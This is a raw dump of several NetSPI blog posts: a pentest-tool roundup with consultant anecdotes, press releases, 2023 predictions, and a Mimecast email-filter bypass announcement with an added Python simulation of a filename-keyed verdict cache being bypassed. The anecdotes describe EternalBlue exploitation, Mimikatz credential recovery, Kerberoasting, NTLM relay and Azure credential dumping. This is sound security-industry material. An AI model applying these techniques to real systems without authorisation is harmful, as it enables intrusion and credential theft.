“…Compared to other companies I have worked at, Resolve at least halves the amount of time spent reporting, allowing for more time to be spent performing testing.”
4. CrackMapExec
CrackMapExec is a versatile pentesting tool used to perform various post-exploitation techniques from a single user interface. NetSPI pentesters have used this tool to execute pass-the-hash attacks, credential dumping, password spraying, and more – often resulting in administrative compromise.
“It is actively developed and is a framework that allows execution of multiple techniques and interaction with multiple common services.”
5. Browser Dev Tools
While Browser Dev Tools are a built-in feature of all modern browsers intended to let developers debug their web applications, they can also be leveraged by penetration testers. Their availability in modern browsers such as Safari, Chrome, and Firefox makes them one of the most foundational and accessible means of application security testing.
Dev Tools allow penetration testers to view and manipulate all client-side scripts, cookies, and other web elements. They also come in handy when looking for hidden fields and other potentially sensitive data. Their ability to inspect and manipulate the contents of a given web page within the context of the browser makes them a great resource for anything from debugging to viewing network traffic when an intercepting proxy is not available.
“Some applications insecurely configure user permissions on the client-side. In cases like this, an attacker can modify client-side code to elevate their permissions in the application.”
6. Metasploit
The Metasploit exploitation framework provides all the functionality a pentester might need, including scanning networks and targets, launching exploits, receiving shells, and even performing post-exploitation. With its open-source nature and constantly evolving feature set, Metasploit is a top penetration testing tool because it allows testers to leverage exploits to demonstrate the full impact of security vulnerabilities.
NetSPI Security Consultant James Maguire used Metasploit to compromise a Windows domain and demonstrate the risks of missing security patches and password reuse to the client.
He shared, “Using Metasploit, I scanned the network for hosts missing the infamous MS17-010 (EternalBlue) patch.” He found three servers missing the patch, picked one, and launched the exploit using Metasploit. According to James, “The exploit was successful, and I got a Meterpreter shell. Meterpreter is a special attack payload available to Metasploit users and has several useful post-exploitation features and modules. I used one of my favorite modules (Mimikatz) to recover cleartext credentials from the victim server.” While reviewing the credentials, he discovered one of the accounts had domain admin privileges, and with that, he was able to deliver valuable penetration test results with ease.
“I was able to use Metasploit to compromise a Windows domain and demonstrate the risks of missing security patches and password reuse to the client.”
7. SQLmap
SQLmap is an open-source project that tests for SQL injection vulnerabilities in web application requests. If found, it will also identify the type and location of the injection. It provides testers with an easy-to-use tool to interact with the vulnerability to enumerate data from the application's database.
SQLmap is a favorite among NetSPI’s consultants because SQL injection can be a very tedious finding to verify and determine its impact. SQLmap speeds up that process, thereby speeding up reporting.
NetSPI Security Consultant II Josiah Kohlmeyer explains, “When we find a SQL injection vulnerability, one of the ways to verify the finding is by enumerating the database version or database name. If the database name was ‘dev-database’, manually enumerating that requires us to hand-write SQL statements to brute-force determine each letter of the name one letter at a time.” With SQLmap, pentesters can run the tool with the "--current-db" option and it will complete the enumeration and return the database name in 30-60 seconds instead of the 15-30 minutes it would take to do manually.
“I've found SQL injection on several web application assessments, and I've always used SQLmap to verify the finding. Clients are always surprised to see I have information that should only be internally known.”
8. Rubeus
Known as the “C# toolset for raw Kerberos interaction and abuses,” Rubeus made the cut for its flexibility and power in Kerberos abuse.
Released in 2018, Rubeus allows for Kerberos interaction and abuse of misconfigured Active Directory objects. It lets an attacker request valid Ticket Granting Tickets (TGTs) and Ticket Granting Service (TGS) tickets for accounts configured with a Service Principal Name (SPN), and inject those Kerberos tickets into memory or a process, or write them to a file, to authenticate on the domain.
NetSPI consultants have leveraged Rubeus to execute Kerberoasting, AS-REP roasting, pass-the-ticket, pass-the-hash, golden ticket, silver ticket, and diamond ticket attacks.
“Rubeus implements almost all of the known Kerberos attacks and is extremely flexible in how it works. There is no ONE thing out there that could replace Rubeus if it was somehow removed from history.”
- Derek Wilson, Senior Security Consultant
“After guessing a weak user account password, I used Rubeus to request all domain user account hashes with a Service Principal Name configured with RC4 encryption. I sent the hashes to a password cracker and cracked a domain admin password.”
9. MicroBurst
Developed by NetSPI's very own VP of Research Karl Fosaaen, MicroBurst is a PowerShell toolkit that allows for various attacks on Azure Services.
It houses all the attack automation scripts useful in Azure Cloud Pentesting and includes functions for anonymous enumeration, authenticated attacks, auditing configurations, and performing post-exploitation actions.
The information gathering tools are especially useful, and the password dumping function "Get-AzPasswords" has proven to be a crucial component of many successful exploitation campaigns to dump Key Vaults, Automation Accounts, and other credentials to escalate privileges in an Azure subscription.
In this webinar, Karl leverages Get-AzPasswords to automate the collection of passwords stored in Azure. Additionally, MicroBurst can also be used for Azure subdomain enumeration as seen in this demo by Day Johnson.
Bonus Tools: Visit our repository of NetSPI-developed open source tools.
10. BloodHound
BloodHound allows you to scan an Active Directory (AD) domain and display privilege escalation and lateral movement paths in a graph. This is incredibly useful for blue and red teams to discover and block these attack paths.
It provides a visual map of the AD environment which makes it easier to identify relationships between objects and discover attack paths.
NetSPI Senior Security Consultant Sam Bogart found that a client had unintentionally granted the "Domain Users" group high privileges by directly modifying the domain ACL. Another client had one computer on the domain where "Domain Users" were in the local Administrators group and a Domain Admin was logged in.
In both examples, Sam used BloodHound to display these paths for privilege escalation and provide a full attack path from a compromised account to "Domain Admin."
“I was on a test with a network that was pretty hardened: no missing patches and no man-in-the-middle opportunities. It was looking pretty grim. But thanks to BloodHound, I was able to find a misconfigured DACL that allowed me to escalate from a standard Domain User to Domain Admin in two steps.”
- Cameron Geehr, Managing Consultant
“BloodHound offers unrivaled insight into Active Directory misconfigurations that could lead to lateral movement and privilege escalation.”
11. SAML Raider
SAML Raider is a Burp Suite extension for testing SAML infrastructures.
It contains two core features: a SAML message editor to manipulate SAML messages and an X.509 certificate manager. Our security consultants find value in SAML Raider because of the ease with which it allows you to read the SAML message and manipulate it for an attack – specifically for XML signature wrapping attacks and XML external entity injection attacks.
Every time NetSPI Senior Security Consultant Aussan Saad-Ali sees SAML authentication, he checks with SAML Raider to see if an XSW or XXE attack is possible. Check out this how-to article to learn how to accomplish this.
“The ease that it allows you to read the SAML message and manipulate it for an attack makes it valuable to me, especially how it facilitates the different type of attack scenarios such as XML signature wrapping attack and XML external entity injection attack.”
12. Impacket
Impacket is a collection of Python classes for working with network protocols, primarily used by developers.
It can be used during all phases of network penetration testing. With more than 50 features, Impacket performs a wide range of activities – from exploiting known vulnerabilities to carrying out man-in-the-middle (MitM) attacks and fetching Windows secrets.
“During one of my projects, I was able to capture NTLMv2 hashes on the internal network. It was not possible to crack the hashes to get the password, so I used Impacket ntlmrelayx.py and was able to relay them to get local admin access to the workstation.”
– Ruchit Patel, Senior Security Consultant
Which tools are you or your team using to uncover security flaws?
These 12 tools will help increase pentest efficiency and identify unique attack paths – ultimately to ensure more thorough security testing and support faster remediation.
Looking for a resourceful team to pentest your applications, networks, cloud platforms, IoT devices, blockchain implementations, and beyond? Explore NetSPI’s full suite of penetration testing services.
A special thank you to everyone who participated in this article:
Amidst a year of record growth and momentum, NetSPI is recognized again for its leadership and culture.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, has been named one of the top workplaces in the U.S. by Energage, a leading provider of technology-based employee engagement tools. Winners are chosen based on an anonymous third-party employee survey that measures several aspects of workplace culture, including alignment, execution, and connection.
“We’re proud to be recognized as a top workplace for the second year in a row,” said Aaron Shilts, CEO of NetSPI. “Every employee has contributed to our record growth this year, continuing to drive results as we expand. Our strong culture remains key to what makes NetSPI a great place to work.”
This Top Workplaces recognition follows a year of record growth and momentum for the company, including the hiring of more than 230 people and the promotion of over 170 employees, among them Norman Kromberg to CISO. Together with a number of new product innovations, this led to 58% organic revenue growth for the fiscal year.
“In a year of record growth, we’re particularly proud of the growth amongst NetSPI employees,” said Heather Crosley, Vice President of People Operations at NetSPI. “Our employees continue to be committed to collaboration, and creating a culture of excellence and belonging.”
Top Workplaces USA celebrates organizations with 150 or more employees that have built great cultures. While more than 42,000 organizations were invited to participate, just over 1,200 organizations have been honored with the Top Workplaces USA award this year.
For more information about joining NetSPI's growing team, please visit www.netspi.com.
About Energage
Making the world a better place to work together.™
Energage is a purpose-driven company that helps organizations turn employee feedback into useful business intelligence and credible employer recognition through Top Workplaces. Built on 14 years of culture research and the results from 23 million employees surveyed across more than 70,000 organizations, Energage delivers the most accurate competitive benchmark available. With access to a unique combination of patented analytic tools and expert guidance, Energage customers lead the competition with an engaged workforce and an opportunity to gain recognition for their people-first approach to culture. For more information or to nominate your organization, visit Energage or Workplaces.
[post_title] => Energage Names NetSPI a Top Workplaces USA Winner for Second Consecutive Year
[post_excerpt] => Read why NetSPI was honored as a Top Workplaces USA by Energage for the second consecutive year.
[guid] => https://www.netspi.com/?p=29291
[11] => WP_Post Object
[post_date] => 2023-01-25 07:00:00
Following a momentous year of global expansion and technology advancements, the offensive security leader announces an innovation group and strategic appointments.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced a record fiscal year, achieving 58% organic revenue growth in 2022. The growth is attributed to the company’s strategic expansion into Europe, the Middle East, and Africa (EMEA), and an enhanced portfolio of offensive security offerings.
In 2022, NetSPI launched its Attack Surface Management (ASM) platform and blockchain penetration testing solutions, and made significant updates to its Breach and Attack Simulation (BAS) services, further solidifying the company as a market leader. During the banner year, NetSPI added more than 300 new clients to its roster, which includes nine of the top 10 U.S. banks, three FAANG companies, top cloud providers, four of the five largest healthcare companies, and several Fortune 500 brands.
To support the company’s growth, NetSPI also hired more than 230 employees, some of whom were trained through its NetSPI University program, and promoted over 170 staff members, addressing the industry’s talent gap head-on. The company’s commitment to career development is one of many reasons why it was honored in the 2022 Top Workplaces USA, Top 200 Workplaces in Minnesota, and Cultural Excellence awards.
“Over the past year, NetSPI has challenged the status quo in the cybersecurity market, pushing the envelope to deliver new, enhanced, continuous offensive security solutions – and the industry has taken note,” said Aaron Shilts, CEO of NetSPI. “As we forge ahead in 2023, our team will continue to innovate to improve the security posture of organizations worldwide, powered by our customer-first approach to security.”
Introducing NetSPI Labs, an Innovation Incubator for the Security Community
Building on its recent momentum, NetSPI has formalized NetSPI Labs, a dedicated innovation group designed to deliver industry research to the security community and develop new solutions for the cybersecurity and vulnerability management challenges organizations face.
NetSPI has appointed three Vice Presidents of Research, Karl Fosaaen, Nick Landers, and Scott Sutherland, to lead NetSPI Labs. They bring decades of experience in security testing, product and service line development, and adversarial research.
“NetSPI Labs is a game-changer for the industry. This innovation engine will enhance cross-team collaboration to identify the white space in offensive security, and how NetSPI can best deliver on unmet needs,” said Charles Horton, Chief Operating Officer at NetSPI. “The team will share resources and research with the security community, furthering industry collaboration to stay one step ahead of adversaries.”
NetSPI Appoints Norman Kromberg as Chief Information Security Officer
NetSPI also announced the appointment of Norman Kromberg as its Chief Information Security Officer (CISO). In this role, he will oversee the company’s security operations and architecture.
Kromberg brings more than 30 years of experience in cybersecurity, information assurance, risk management, and software quality and compliance, previously holding security leadership positions at companies such as SouthernCarlson, Optiv, and ACI Worldwide. He also brings knowledge of the company’s business processes from his prior role as a Managing Director at NetSPI.
“It is a pivotal time for NetSPI, as the company continues its rapid growth and innovates at accelerated speeds,” said Kromberg. “Security is paramount to NetSPI; it is in its DNA. This role further showcases the company’s commitment to staying ahead of bad actors and securing our clients. I’m excited for this next chapter with the company.”
For more information about NetSPI or to join NetSPI’s growing team, please visit www.netspi.com.
[post_title] => NetSPI Achieves 58% Organic Revenue Growth in 2022, Unveils Initiative to Accelerate Offensive Security Innovation
[post_excerpt] => Read about NetSPI's momentous year of global expansion and technology advancements, explore the NetSPI Labs innovation group, and meet the company’s new CISO.
[guid] => https://www.netspi.com/?p=29219
[12] => WP_Post Object
[post_date] => 2023-01-10 06:04:00
nVisium’s cloud and application security experts join NetSPI to support, scale, and deliver the most comprehensive suite of offensive security solutions.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced the acquisition of nVisium to further scale its offensive security solutions and address heightened demand for human-delivered penetration testing. nVisium will support NetSPI’s continued efforts to deliver strategic security testing solutions to enterprises.
nVisium is an authority in security testing, with an impressive track record of delivering cloud and application pentesting to Fortune 500 companies and well-known brands such as Carfax, 1Password, Bluescape, Deltek, EAB, and Trimble.
With the acquisition, NetSPI now has over 450 offensive security experts globally who can support and scale to meet the needs of current and future clients.
“Our decision to acquire nVisium comes down to one core factor: acquiring amazing talent,” said Aaron Shilts, CEO at NetSPI. “We’re bringing two brilliant, culturally-aligned, and complementary offensive security teams together who are committed to delivering the highest standard of penetration testing on the market today. I’m excited to see what nVisium and NetSPI can accomplish together.”
NetSPI welcomes Jack Mannino, CEO and founder of nVisium, to its senior leadership team. He founded nVisium in 2009 to develop new and more efficient ways of protecting software and of scaling secure development across the software development lifecycle (SDLC).
“NetSPI’s market leadership and people-first culture are a natural complement to what we’ve built at nVisium. We’re all-in on the mission to help organizations keep pace with their ever-evolving attack surface,” added Jack. “By joining forces with NetSPI, we have a massive opportunity to expand the breadth and depth of solutions we deliver, improve the client experience, and introduce new growth opportunities to our employees.”
NetSPI is the leader in enterprise penetration testing and attack surface management. Today, NetSPI offers the most comprehensive suite of offensive security solutions – attack surface management, penetration testing as a service, and breach and attack simulation. Through a combination of technology innovation and human ingenuity NetSPI helps organizations discover, prioritize, and remediate security vulnerabilities. For over 20 years, its global cybersecurity experts have been committed to securing the world’s most prominent organizations, including nine of the top 10 U.S. banks, three of the five largest healthcare companies, the leading cloud providers, and many of the Fortune® 500. NetSPI, a KKR and Ten Eleven Ventures portfolio company, is headquartered in Minneapolis, MN, with global offices across the U.S., Canada, the UK, and India. Follow NetSPI on Facebook, Twitter, and LinkedIn.
About nVisium
nVisium empowers organizations to eliminate security vulnerabilities through proven in-depth assessments, remediation, and training programs. Our experienced team of security-savvy engineers help organizations establish best practices with high ROI for their engineering and development lifecycles. Through services, software solutions, and R&D, nVisium provides security support for applications, operating systems, networks, mobile, cloud, and IoT unique to business operations, compliance initiatives, and more. Additionally, nVisium offers instructor-led and online security training. Privately owned and founded in 2009, nVisium is headquartered in Falls Church, VA, and names Fortune 500 companies and household brands as customers.
[post_title] => NetSPI Acquires nVisium, Bringing Top Penetration Testing Talent Together
[post_excerpt] => nVisium’s cloud and application security experts join NetSPI to support, scale, and deliver the most comprehensive suite of offensive security solutions. Learn how to work with the combined organization.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => netspi-acquires-nvisium
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:09:56
[post_modified_gmt] => 2023-01-23 21:09:56
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=29159
[menu_order] => 39
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[13] => WP_Post Object
(
[ID] => 29047
[post_author] => 91
[post_date] => 2022-12-20 09:00:00
[post_date_gmt] => 2022-12-20 15:00:00
[post_content] =>
As 2022 comes to a close, it’s clear that this has been a restless year for both threat actors and cybersecurity professionals.
The year started off with a bang as the industry worked around the clock to detect and patch the Log4j vulnerabilities following a mid-holiday disclosure. The cyber sector remained in a perpetual busy season as new technologies like cryptocurrency wallets were hacked, non-profit organizations and health insurance providers suffered data breaches, and entire government systems experienced ransomware attacks – not to mention the prevalence of Russian cyberwarfare which signaled the need for heightened security across the globe.
But for every hack, data breach, and ransomware attack that occurred, there were thousands prevented by global cybersecurity practitioners. There’s a lot of innovation and collaboration to celebrate as we turn the page to 2023.
As we enter the new year, we asked our global team to chime in on the trends they anticipate. From machine learning and software supply chain attacks to the cybersecurity shortage and cyber insurance, our team sees big things ahead.
There will be an emphasis on machine learning security, threats, and vulnerabilities.
“Machine learning (ML) is already deployed in numerous technologies, especially those concerned with security — for example email filters, security information and event management (SIEM) dashboards, and endpoint detection and response (EDR) products. If you thought you could delay ML security conversations, think again. There is a growing group of security researchers focused on Adversarial ML, which includes both attacks on models themselves (inversion, extraction, cloning, etc.) and the use of ML in network attacks and social engineering.
In the upcoming year, we'll see a growing list of vulnerabilities being published for ML-integrated systems. Additionally, we'll see a large amount of research focused on evading classification models to improve attacker success rates as well as some of the first notable "model duplication" incidents — where one entity is accused of cloning a model or attackers release "cloned models" of sensitive classifiers and advanced prediction engines. Privacy is often overlooked when thinking about model training, but data cannot be completely anonymized without destroying its value to ML. In other words, models already contain swaths of private data that might be extracted as part of an attack. While many companies claim to have ‘private enterprise models’, I suspect we'll begin seeing data breaches from model extraction research.” — Nick Landers, VP of Research, NetSPI
Distributed Ledger Technology (DLT) will help mitigate software supply chain attacks.
“Over the last few years, there have been several ‘supply chain compromises’ that boil down to an unauthorized code submission. In response to those attacks, many software providers have started to bake more security reviews and audit controls into their SDLC process. Additionally, the companies consuming software have beefed up their requirements for adopting/deploying 3rd party software in their environment. However, neither really solves the core issue, which is that anyone with administrative access to the systems hosting the code repository can bypass the intended controls. As a result, we expect to see software supply chain attacks continue into 2023 and we need a solution.
This is where distributed ledger technology (DLT) comes in. DLT can basically be used as a database that enforces security through cryptographic keys and signatures. Since the stored data is immutable, DLT can be used anytime you need a high integrity source of truth. That comes in handy when trying to ensure the security of open-source projects (and maybe some commercial ones). DLT could be a real asset in stopping supply chain attacks and though the adoption of DLT is still in its infancy, we’ll see some interesting use cases gain momentum in 2023.” — Scott Sutherland, VP of Research, NetSPI
The way organizations approach pentesting will become more continuous.
“The perimeter is essentially dead, so the way organizations approach pentesting has to evolve. The attack surface has become more fluid so you have to be able to scan for new assets and entry points continuously. In 2023, organizations will combine traditional pentesting, which in many cases will still be required for regulatory needs, with the proactive approach of a continual assessment of their attack surface. The result will be better awareness of the attack surface and more comprehensive traditional pentesting as there is more information about the true attack surface.” — Chad Peterson, Managing Director, NetSPI
Cyber insurance will become a leading driver for investment in security.
“Cyber insurance will become a leading driver for investment in security and IT controls. Carriers and brokers will continue to increase underwriting requirements with the goal of not paying out on claims. The challenge for CISOs, CROs, CIOs, CFOs and Board of Directors is that the carriers will use requirements focused on avoiding claims meaning another “compliance” requirement on top of the existing ones. While there may be evolution to acceptance of SOC 2, NIST, ISO and other certifications, the expense will be there for years.” — Norman Kromberg, Managing Director, NetSPI
By the end of next year every major financial institution will have announced adoption of blockchain technology.
“There is a notable trend of Blockchain adoption in large financial institutions. The primary focus is custodial offerings of digital assets, and private chains to maintain and execute trading contracts. The business use cases for Blockchain technology will deviate starkly from popularized tokens and NFTs. Instead, industries will prioritize private chains to accelerate business logic, digital asset ownership on behalf of customers, and institutional investment in Proof of Stake chains.
By the end of next year, I would expect every major financial institution will have announced adoption of Blockchain technology, if they haven’t already. Nuanced technologies like Hyperledger Fabric have received much less security research than Ethereum, EVM, and Solidity-based smart contracts. Additionally, the supported features in business-focused private chain technologies differ significantly from their public counterparts. This ultimately means more attack surface, more potential configuration mistakes, and more required training for development teams. If you thought that blockchain was “secure by default”, think again. Just like cloud platform adoption, the promises of “secure by default” will fall away as unique attack paths and vulnerabilities are discovered in the nuances of this tech.” — Nick Landers, VP of Research, NetSPI
We will see industry aligned compliance regulations with real penalties.
“Regulations will continue to evolve and become more prescriptive. Regulations need to be much more mature, stringent, and punitive. Organizations must be held accountable for their inaction in the area of cybersecurity. For far too long organizations have not taken cybersecurity seriously enough. No longer is it okay for an organization to act as though it wasn't their fault or that they weren’t culpable for a breach that occurred. At the very least regulations must hold organizations accountable for the implementation of “Minimum Necessary” cybersecurity controls with heavy penalties for non-compliance. Organizations will be held accountable for basic cybersecurity hygiene. If an organization is unable to meet the most basic standards, a regulator will require a third-party to take over Cybersecurity Program execution (and the organization will be mandated to cover the associated costs). Like the FDA, we will start seeing industry aligned compliance regulations with real penalties that will force compliance and organizational change. The key will be enforcement and penalties.” — Ron Kuriscak, Managing Director, NetSPI
Training programs will have even more emphasis placed on them to narrow the employment gap.
“2023 will continue to be a jobseeker’s market as many organizations continue to hire cybersecurity talent. With the current cybersecurity shortage demand continues to outweigh supply. Cybercrime magazine predicts that there will still be 3.5 million cyber openings come 2025 — a staggering number to think about, but it’s not changing anytime soon. Training programs, like NetSPI University, will have even more emphasis placed on them to narrow that employment gap. NetSPI U has contributed to the scaling of our consulting team immensely (100+ hires through NetSPI U since 2018). If other organizations can figure out how to hire for team/culture fit and train cybersecurity specific skills through similar programs, the talent gap will continue to lessen. Additionally, in-depth but quick interview processes have become instrumental in hiring top talent before the competition — gone are the days of a drawn-out interview process as candidates are on and off the market extremely fast.” — Heather Crosley, VP People Operations, NetSPI
We expect to see an increase in cloud-agnostic application designs – and corresponding configuration and application vulnerabilities.
“Almost every company we work with is building in the cloud or in the process of migrating to it. While companies may dabble in many cloud platforms, they deploy the vast majority of their infrastructure in one primary platform. As part of that effort, many companies have built their applications using cloud-native, platform-specific technologies. For many companies, that initial transition to the cloud provides them with new performance benefits and the ability to truly scale applications and/or services for the first time. However, the downside to this is that after they've spent all of those R&D dollars on their initial deployments, they may want to move their applications and/or services to another cloud platform (for a variety of reasons, including cost) but they can't pivot without a herculean effort (and additional cost). To avoid this problem in the future many companies are investing dev dollars into cloud-agnostic application designs, which tend to rely on both Kubernetes and containers like Docker. Changing our collective mindset about the "right way" to build and deploy applications in that direction introduces a whole new set of configuration and application vulnerabilities that many companies are not prepared to address. Given the trends from previous years, we expect to see some growth in products and services in that space over the next year.” — Karl Fosaaen, VP of Research, NetSPI
The breach and attack simulation market is in the midst of its evolution.
“The Breach and Attack Simulation (BAS) market is in the middle of its evolution, and we can expect to see some useful incremental improvements as we turn the page on the year. At a high level, customers really value a human component but many BAS solutions in the market don’t offer that today. This will lead to service companies growing in the product space and products moving toward the services space. As a result, most security companies will need to provide a hybrid of technology-enabled services just to stay competitive in the next few years.
However, to meet customer demand in 2023, more BAS platforms will offer robust modules to simulate flexible command and control, email stack, and native cloud platform attack procedures, as well as the ability to create or customize modules in a meaningful way. Additionally, we’ll see an increase in streamlined product deployments (most likely in the form of SaaS-based offerings) and integrations, as well as improvements in validation inconsistencies and an increase in BAS solutions that offer meaningful data insights.
To reduce the costs needed for configurations, we’ll see more BAS companies working to streamline their product deployments to help reduce the overhead on their customers. We’ll also see innovations created to help streamline the integration process and limit the need for customization. It is also a challenge to verify that every attack module run by a BAS platform was delivered, executed, and completed successfully. However, it’s even harder to accurately determine if the action was blocked (and by what), determine if an alert was generated, and verify the alert triggered the creation of a proper response ticket. Which is why this year, I believe we’ll see strides made to improve validation inconsistencies. Finally, we’ll see an increase in BAS solutions in the market that offer meaningful data insights to allow companies to track the detection coverage over time.” — Scott Sutherland, VP of Research, NetSPI
The cybersecurity industry will certainly be thrown curveballs in 2023 but keeping an eye on these nine trends may just help you stay one step ahead of adversaries and inevitable change. For additional research and insights from Team NetSPI, visit https://www.netspi.com/pentesting-team/.
Patrick successfully bypassed Mimecast URL and file inspection features and worked with the email security company to remediate the issues.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced that Principal Security Consultant Patrick Sayler was recognized on Mimecast’s Security Researcher Wall of Fame for bypassing email defenses within Mimecast Targeted Threat Protection (TTP).
Patrick was able to bypass the URL and file inspection features which could have allowed an adversary to serve a malicious file or URL after Mimecast had already deemed it secure. A full breakdown of the process and remediation steps taken can be found on the NetSPI technical blog.
Patrick uncovered the vulnerability during a hybrid breach and attack simulation and social engineering penetration testing engagement for one of NetSPI’s clients. He worked closely with the Mimecast Responsible Disclosure Team to remediate the core issues identified within the TTP platform:
The file content was not served by Mimecast (Mimecast has committed to implementing a fix)
File inspection followed a predictable pattern (This issue has been addressed)
Results were stored by filename and shared (Addressed via risk-based caching on a continuous basis)
“This is a great reminder of the vital importance of defense in depth,” said Patrick. “When a frontline technical control fails, do you have back up, layered defenses and policies in place to slow down adversaries and prevent incident escalation? Social engineering and breach and attack simulation assessments can help organizations answer this question with confidence.”
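The third finding above (verdicts stored by filename and shared) is worth making concrete. The following is an added illustration, not Mimecast’s code or the code from the engagement: a hypothetical inspection engine and two cache designs, one keyed by filename and one keyed by a hash of the inspected bytes. The scanner, the marker it looks for, and the sample files are all constructed for the example. It shows the replay pattern the release describes: get a benign file judged clean under a name, then serve different content under that same name.

```python
import hashlib
from typing import Callable, Dict, Tuple

# Constructed marker standing in for "content the inspection engine would flag".
# The scanner below is a hypothetical stand-in, not Mimecast's engine.
MALICIOUS_MARKER = b"CONSTRUCTED-MALICIOUS-MARKER"


def inspect(content: bytes) -> str:
    """Simulated content inspection: the verdict depends only on the bytes scanned."""
    return "malicious" if MALICIOUS_MARKER in content else "clean"


class FilenameKeyedCache:
    """Weak design: a verdict is cached and shared by filename alone.

    Once a name has been judged clean, later content served under the same
    name is never inspected again.
    """

    def __init__(self, scanner: Callable[[bytes], str]) -> None:
        self.scanner = scanner
        self.verdicts: Dict[str, str] = {}
        self.scans = 0  # number of real inspections performed

    def check(self, filename: str, content: bytes) -> str:
        if filename not in self.verdicts:
            self.scans += 1
            self.verdicts[filename] = self.scanner(content)
        return self.verdicts[filename]


class ContentKeyedCache:
    """Hardened design: the cache key is a hash of the bytes actually inspected.

    Different content under the same filename gets its own inspection, so a
    benign verdict cannot be reused for a swapped-in payload.
    """

    def __init__(self, scanner: Callable[[bytes], str]) -> None:
        self.scanner = scanner
        self.verdicts: Dict[str, str] = {}
        self.scans = 0

    def check(self, filename: str, content: bytes) -> str:
        # The filename is deliberately not part of the key.
        key = hashlib.sha256(content).hexdigest()
        if key not in self.verdicts:
            self.scans += 1
            self.verdicts[key] = self.scanner(content)
        return self.verdicts[key]


def swap_attack(cache) -> Tuple[str, str]:
    """Replay the bypass pattern against a cache: first a benign file under a
    name, then malicious content under that same name (constructed inputs).

    Returns the two verdicts the cache hands back.
    """
    benign = b"Quarterly report. Nothing to see here."
    malicious = b"MZ" + MALICIOUS_MARKER + b" dropper stub"
    first = cache.check("invoice.pdf", benign)
    second = cache.check("invoice.pdf", malicious)
    return first, second


if __name__ == "__main__":
    weak = FilenameKeyedCache(inspect)
    hard = ContentKeyedCache(inspect)
    print("filename-keyed:", swap_attack(weak), "scans:", weak.scans)
    print("content-keyed: ", swap_attack(hard), "scans:", hard.scans)
```

The filename-keyed cache returns "clean" twice and only ever inspects once; the content-keyed cache inspects both payloads and flags the second. One caveat that ties back to the first finding: hashing the inspected bytes only helps if the bytes the user receives are the bytes that were inspected. If the inspection service fetches its own copy and the user later fetches another from the origin, the two can differ, which is why serving the inspected copy (or re-inspecting at delivery time) is the durable fix rather than cache keying alone.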
[post_title] => NetSPI’s Patrick Sayler Earns Spot on Mimecast’s Security Researcher Wall of Fame for Email Defense Evasion
[post_excerpt] => Explore how Patrick successfully bypassed Mimecast URL and file inspection features and worked with the email security company to remediate the issues.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => mimecast-email-defense-evasion
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:05
[post_modified_gmt] => 2023-01-23 21:10:05
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28670
[menu_order] => 59
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[15] => WP_Post Object
(
[ID] => 28522
[post_author] => 91
[post_date] => 2022-10-10 08:10:00
[post_date_gmt] => 2022-10-10 13:10:00
[post_content] =>
The penetration testing company will help enterprises leveraging or exploring blockchain uncover the security weaknesses in their deployments.
Minneapolis, MN – NetSPI, the leader in enterprise penetration testing and attack surface management, today announced its new deployment-inclusive blockchain penetration testing service. The company will provide a comprehensive, full-spectrum evaluation of blockchain-based deployments to enterprises by utilizing its decades of penetration testing expertise, coupled with its understanding of the architecture's unique security concerns.
Its blockchain penetration testing services will evaluate all deployment models, including private, permissioned, consortia, and public, and various distributed ledger technologies including ConsenSys Codefi, R3 Corda, Hyperledger Fabric, custodial platforms and public chains, and more.
“Blockchain’s biggest innovations are below the surface,” according to the Forbes Blockchain 50 2022. The world’s largest organizations are now using distributed ledger technology to manage daily operations, from verifying insurance claims to tracking auto parts in the supply chain. Organizations are recognizing the scalability, competitive advantages, and revenue opportunities it presents.
“As adoption skyrockets, technology and security teams will need to quickly develop their blockchain acumen to support and protect these solutions – this begins with identifying and addressing people, process, and technology gaps,” said Travis Hoyt, Chief Technology Officer at NetSPI. “Our new blockchain penetration testing service line demonstrates NetSPI’s commitment to be relentlessly future focused, so our customers can be too.”
Enterprises currently leveraging or evaluating the potential of blockchain can partner with NetSPI to improve the security of their deployments.
To learn more about NetSPI’s blockchain penetration testing services, visit www.netspi.com or contact us.
On October 5, NetSPI was featured in the Channel Future article called KKR Ups Investment in NetSPI with $410 Million in New Funding. Read the preview below or view it online.
+ + +
Global investment firm KKR is providing $410 million in new funding to NetSPI, a provider of enterprise penetration testing and attack surface management.
KKR is increasing its investment in NetSPI with the funding. It initially invested in NetSPI in May 2021.
The funding recapitalizes NetSPI’s first institutional investor Sunstone Partners. The transaction will close by the end of 2022, subject to customary regulatory approvals.
Lauren Gimmillaro is NetSPI’s vice president of business development and strategic alliances.
“The investment from KKR will be used to continue innovating and expanding our technology portfolio, to expand globally, and to increase the talent at NetSPI,” she said. “We launched the NetSPI Partner Program earlier this year. So this funding will help us grow our channel team, ranging from channel development managers to those who can train partners in enablement, and much more. With this investment, we can double down on growth and expansion. And an important piece of that plan is the channel.”
Enterprises use NetSPI’s suite of offensive security solutions to uncover critical security gaps, minimize risk and reduce the likelihood of a security incident. The suite includes attack surface management, penetration testing as a service (PTaaS), and breach and attack simulation.
[post_title] => Channel Futures: KKR Ups Investment in NetSPI with $410 Million in New Funding
[post_excerpt] => NetSPI was featured in the Channel Future article called KKR Ups Investment in NetSPI with $410 Million in New Funding.
[post_status] => publish
[comment_status] => closed
[ping_status] => closed
[post_password] =>
[post_name] => channel-futures-kkr-ups-investment-in-netspi
[to_ping] =>
[pinged] =>
[post_modified] => 2023-01-23 15:10:11
[post_modified_gmt] => 2023-01-23 21:10:11
[post_content_filtered] =>
[post_parent] => 0
[guid] => https://www.netspi.com/?p=28554
[menu_order] => 76
[post_type] => post
[post_mime_type] =>
[comment_count] => 0
[filter] => raw
)
[17] => WP_Post Object
(
[ID] => 28559
[post_author] => 91
[post_date] => 2022-10-05 09:00:00
[post_date_gmt] => 2022-10-05 14:00:00
[post_content] =>
